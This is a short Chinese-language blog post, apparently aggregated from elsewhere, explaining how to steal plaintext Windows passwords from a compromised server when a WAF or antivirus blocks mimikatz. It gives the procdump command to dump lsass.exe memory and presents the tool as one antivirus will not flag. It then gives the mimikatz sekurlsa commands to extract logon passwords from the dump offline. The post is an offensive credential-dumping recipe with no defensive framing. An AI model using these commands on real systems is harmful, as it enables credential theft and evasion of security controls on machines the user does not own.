mimikaz在waf下抓取windows明文密码
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mimikaz在waf下抓取windows明文密码相关的知识,希望对你有一定的参考价值。
当拿到目标服务器时,我们一般会使用神器mimkaz来抓取目标服务器的明文密码,但是如果目标服务器配置了waf,mimikaz无法抓取时,这是可以将存有帐号密码的dmp文件下载到本地来使用mimikaz抓取。
实现自己搭建一个与目标机器同样的系统环境。然后利用如下命令来下载dmp文件;
procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
这个procdump.exe是微软工具包中的一个工具,不会被杀毒ban了,将该dmp下载好了之后,利用一下两条mimikaz命令,可以抓取出windows明文密码
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords full
以上是关于mimikaz在waf下抓取windows明文密码的主要内容,如果未能解决你的问题,请参考以下文章